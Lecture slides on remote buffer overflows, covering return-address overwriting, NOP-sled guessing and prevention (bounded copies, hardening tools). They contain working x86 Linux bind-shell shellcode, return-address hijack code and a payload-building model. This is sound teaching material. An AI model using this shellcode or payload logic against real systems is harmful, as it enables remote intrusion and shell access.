Remote Buffer Overflows

Network Security vs. Software Engineering

David Klassen
I gave a practical demonstration and lecture of this presentation to the students in my class at BCIT.

Legal Obstacles to Awareness

Is it lawful to demonstrate security vulnerabilities in non-corporate software?

For computer professionals this is essential information. While it may not be pretty, the study of flawed and incorrect designs is essential. Like any other industry, studying the effects of poor design improves our foresight (as in civil engineering).
Corporate Software Paradigm

Typical Industry Tasks (1999):
  Architecture and Design
  Construction and Release (Code Review)
  White and Black Box Tests
  Load, Performance, Stress Tests
  Automated and Manual User Testing

Admittedly, brute-force/trash testing was not popular.
Security bugs were found by Network Associates etc.

Do these activities encompass security analysis?
Is immersion in the security paradigm needed?
  Penetration Testing, Exploit Research, etc.
Computing Knowledge/History

Volumes of computer-related data / standards

Is teaching students everything possible?

  Desktop shortcut keys (documentation, J. Clark)
  Where security education is lacking (Pothamsetty, 2005)

Only 96 of the 256 (2^8) possible byte values are clearly represented on the typical keyboard (37.5%); the rest, including the control characters in the table that follows, cannot simply be typed.
Ctrl  Oct  Dec  Hex  Char   Esc        Oct  Dec  Hex  Char
----------------------------------------------------------------
^@    000    0   00  NUL    '\0'       100   64   40  @
^a    001    1   01  SOH               101   65   41  A
^b    002    2   02  STX               102   66   42  B
^c    003    3   03  ETX               103   67   43  C
^d    004    4   04  EOT               104   68   44  D
^e    005    5   05  ENQ               105   69   45  E
^f    006    6   06  ACK               106   70   46  F
^g    007    7   07  BEL    '\a'       107   71   47  G
^h    010    8   08  BS     '\b'       110   72   48  H
^i    011    9   09  HT     '\t'       111   73   49  I
^j    012   10   0A  LF     '\n'       112   74   4A  J
^k    013   11   0B  VT     '\v'       113   75   4B  K
^l    014   12   0C  FF     '\f'       114   76   4C  L
^m    015   13   0D  CR     '\r'       115   77   4D  M
^n    016   14   0E  SO                116   78   4E  N
^o    017   15   0F  SI                117   79   4F  O
^p    020   16   10  DLE               120   80   50  P
^q    021   17   11  DC1               121   81   51  Q
^r    022   18   12  DC2               122   82   52  R
^s    023   19   13  DC3               123   83   53  S
^t    024   20   14  DC4               124   84   54  T
^u    025   21   15  NAK               125   85   55  U
^v    026   22   16  SYN               126   86   56  V
^w    027   23   17  ETB               127   87   57  W
^x    030   24   18  CAN               130   88   58  X
^y    031   25   19  EM                131   89   59  Y
^z    032   26   1A  SUB               132   90   5A  Z
^[    033   27   1B  ESC               133   91   5B  [
^\    034   28   1C  FS                134   92   5C  \     '\\'
^]    035   29   1D  GS                135   93   5D  ]
^^    036   30   1E  RS                136   94   5E  ^
^_    037   31   1F  US                137   95   5F  _
      040   32   20  SPACE             140   96   60  `
An assembler course will teach you the basics about a program in memory (globals vs. functions).

How can we make a local exploit force the computer to do what we want?

The key is in the function's return address (e.g. stat.c): whatever value sits in that stack slot when the function returns is where execution continues.
The following code places some carefully designed assembler code in the proper location:

    /* Summarized assembler code to create a listener on port 30464 (a bind shell).
     * 32-bit x86 Linux; on a current toolchain build with
     *   gcc -m32 -fno-stack-protector -z execstack -no-pie
     * so that the stack is executable and nothing guards the return address. */
    unsigned char shellcode8[] =
        "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
        "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
        "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
        "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
        "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
        "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
        "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
        "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
        "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
        "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

    void bar(void)
    {
        int *ret;                   /* The very first local variable of this function. */
        ret = (int *)&ret + 2;      /* Two words up the stack, past the saved EBP, lies the
                                       saved Return Address (RA); 32-bit frame-pointer layout. */
        (*ret) = (int)shellcode8;   /* Overwrite the RA so bar() "returns" into the shellcode
                                       instead of to its caller. */
    }

    int main(void)
    {
        bar();                      /* the listener starts when bar() returns */
        return 0;
    }

We had to alter the code to make this possible, but every buffer overflow uses the same basics: get control of the saved return address and point it at code you supplied.
How about remote network exploits; how do they work?

In the easiest case we provide the assembler code in the data sent.

The RA of the function that contains the BO condition is only approximated: the payload is padded with numerous NOPs ahead of the shellcode, so the guessed address merely has to land somewhere in that NOP sled. NOPs perform nothing, so execution slides through them and, when it hits our code, the port listener starts.
The program is loaded into the top section of the stack, closest to 0xbfffffff (the top of the 32-bit Linux user stack when addresses are not randomized).

Presuming the buffer overflow does not crash the program (as in the demo), a repetitive script can start by guessing a high RA and work down (BForceTest.pl).

In pre-compiled executables BO addresses are easier: the same binary lays out its stack the same way on every installation, so an address found once tends to work elsewhere.
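The sled-and-guess procedure of the last two slides, as an added worked example that is not part of the deck. BForceTest.pl itself is not reproduced on the page, so the loop below is a model of the behaviour the slides describe; the four-byte int3 stand-in shellcode, the 64-byte buffer, the sled length and the sled address are constructed for the demonstration. It lays out one payload as NOP sled, shellcode and a repeated little-endian return-address guess, refuses any guess that would put a NUL byte into the payload (a strcpy-style overflow stops copying there), and counts how many guesses a descent from 0xbfffffff needs before one lands in the sled:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90                 /* x86 single-byte no-operation */
#define STACK_TOP 0xbfffffffU    /* top of the 32-bit Linux user stack, no address randomization */

/* Stand-in for the slide's bind-shell shellcode (constructed: four int3 instructions). */
static const unsigned char demo_shellcode[] = "\xcc\xcc\xcc\xcc";
#define DEMO_SC_LEN (sizeof(demo_shellcode) - 1)

/*
 * Build one attempt: [NOP sled][shellcode][guessed RA, repeated].
 * The guess is written little-endian and repeated to the end of the buffer so
 * the saved return address receives it wherever it sits past the overflow
 * point. Returns the bytes written, or -1 if the parts do not fit or the
 * payload contains a NUL byte (such a guess can never be delivered through a
 * strcpy/gets overflow and must be skipped, not sent).
 */
int build_payload(unsigned char *out, size_t out_len, size_t sled_len,
                  const unsigned char *sc, size_t sc_len, uint32_t ra_guess)
{
    size_t pos, i;

    if (sled_len + sc_len + sizeof ra_guess > out_len)
        return -1;
    memset(out, NOP, sled_len);
    pos = sled_len;
    memcpy(out + pos, sc, sc_len);
    pos += sc_len;
    while (pos + sizeof ra_guess <= out_len) {
        out[pos++] = (unsigned char)(ra_guess & 0xff);
        out[pos++] = (unsigned char)((ra_guess >> 8) & 0xff);
        out[pos++] = (unsigned char)((ra_guess >> 16) & 0xff);
        out[pos++] = (unsigned char)((ra_guess >> 24) & 0xff);
    }
    for (i = 0; i < pos; i++)
        if (out[i] == 0)
            return -1;
    return (int)pos;
}

/* Walking down from the stack top in steps of the sled length gives each guess
 * a fresh window: a smaller step wastes attempts, a larger one can skip the sled. */
uint32_t next_guess(uint32_t current, size_t sled_len)
{
    return current - (uint32_t)sled_len;
}

/* A guess succeeds if it lands anywhere inside the sled; execution then slides
 * through the remaining NOPs into the shellcode. sled_base is where the first
 * NOP actually ended up on the target's stack. */
int guess_hits(uint32_t guess, uint32_t sled_base, size_t sled_len)
{
    return guess >= sled_base && guess < sled_base + (uint32_t)sled_len;
}

/* Offline model of the guess-and-retry loop: attempts until a guess hits, or -1. */
int attempts_until_hit(uint32_t start, uint32_t sled_base, size_t sled_len, int max_tries)
{
    uint32_t g = start & ~3u;    /* keep guesses 4-byte aligned */
    int n;
    for (n = 1; n <= max_tries; n++) {
        if (guess_hits(g, sled_base, sled_len))
            return n;
        g = next_guess(g, sled_len);
    }
    return -1;
}

/* Scratch buffer so a guess can be tried by value: length written (or -1), then bytes. */
static unsigned char scratch[64];
int payload_len_for(uint32_t guess)
{
    return build_payload(scratch, sizeof scratch, 16, demo_shellcode, DEMO_SC_LEN, guess);
}
int payload_byte(size_t i) { return i < sizeof scratch ? scratch[i] : -1; }

int main(void)
{
    int i, n = payload_len_for(0xbfffe0fcU);   /* constructed: a guess the loop would reach */
    printf("payload %d bytes:", n);
    for (i = 0; i < n; i++)
        printf(" %02x", scratch[i]);
    printf("\nguess 0xbfff0000 -> %d (NUL bytes, skipped)\n", payload_len_for(0xbfff0000U));
    printf("attempts to hit a 256-byte sled at 0xbfffe000: %d\n",
           attempts_until_hit(STACK_TOP, 0xbfffe000U, 256, 1000));
    return 0;
}
```

A real run sends each payload over the network and watches whether the listener port opens; the model above only shows why the sled size sets the step and why guesses containing 0x00 (or any other byte the transport strips, which the same check can be widened to cover) are discarded rather than sent.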
Preventative Procedures

Ways to prevent unwanted security breaches:

  Stay aware of all exploits, not just BO.
  Proofread your code for uses of vulnerable practices (last week's lecture).
  Stay interested in brute-force/trash testing.
  Re-compile executables on each machine, so addresses learned from one binary do not carry over.
  SELinux, LIDS, grsecurity, PaX, ProPolice
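One way to act on "proofread your code for vulnerable practices", as an added example that is not code from the deck: the unbounded strcpy pattern that produces the stack overflow of the earlier slides, next to a bounded copy that rejects input which does not fit instead of writing past the buffer. NAME_LEN, copy_bounded and the greet_* functions are names chosen here, and the 199-byte input in main is constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* Vulnerable: strcpy stops only at the first NUL in the input, so anything
 * longer than NAME_LEN-1 characters runs off the end of name[] into the saved
 * frame pointer and return address of this frame, the same slot bar() on the
 * earlier slide overwrote on purpose. Kept for comparison only; nothing in
 * this file calls it with attacker-controlled data. */
void greet_vulnerable(const char *input)
{
    char name[NAME_LEN];
    strcpy(name, input);            /* no bound check: classic stack overflow */
    printf("hello %s\n", name);
}

/* Bounded replacement for strcpy: copies only if the whole string and its
 * terminator fit in dst_len bytes, never reads src beyond dst_len bytes, and
 * leaves dst untouched on failure. Returns 0 on success, -1 if src is too long.
 * Silent truncation (strncpy) is the other common choice; rejecting makes an
 * overflow attempt visible to the caller instead of hiding it. */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = 0;
    if (dst_len == 0)
        return -1;
    while (n < dst_len && src[n] != '\0')
        n++;
    if (n == dst_len)               /* no room left for the NUL terminator */
        return -1;
    memcpy(dst, src, n + 1);        /* n bytes plus the terminator */
    return 0;
}

/* Same behaviour as greet_vulnerable for well-formed input; an overlong name
 * is refused instead of smashing the stack. Returns 0 or -1. */
int greet_safe(const char *input)
{
    char name[NAME_LEN];
    if (copy_bounded(name, sizeof name, input) != 0)
        return -1;
    printf("hello %s\n", name);
    return 0;
}

/* Longest input greet_safe accepts: NAME_LEN minus the terminator. */
size_t max_name_len(void)
{
    return NAME_LEN - 1;
}

int main(void)
{
    char long_name[200];
    memset(long_name, 'A', sizeof long_name - 1);   /* constructed: 199 'A's, the usual overflow probe */
    long_name[sizeof long_name - 1] = '\0';
    greet_safe("alice");
    printf("overlong name rejected: %d\n", greet_safe(long_name));
    return 0;
}
```

The review question for every copy into a fixed-size stack buffer is the one copy_bounded answers explicitly: where is the length of the destination compared with the length of the source before any byte is written?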
Questions
References

Pothamsetty, V. 2005. Where security education is lacking. In Proceedings of the 2nd Annual Conference on Information Security Curriculum Development (Kennesaw, Georgia, September 23-24, 2005). InfoSecCD '05. ACM Press, New York, NY, 54-58. DOI: 10.1145/1107622.1107635

Blomgren, Michel. 2004. Introduction to Shellcoding: How to exploit buffer overflows. tigerteam.se, Advanced Ethical Hacking Course Documentation. Retrieved November 1, 2006 from http://tigerteam.se/dl/papers/intro_to_shellcoding.pdf

www.metasploit.com

www.milw0rm.org
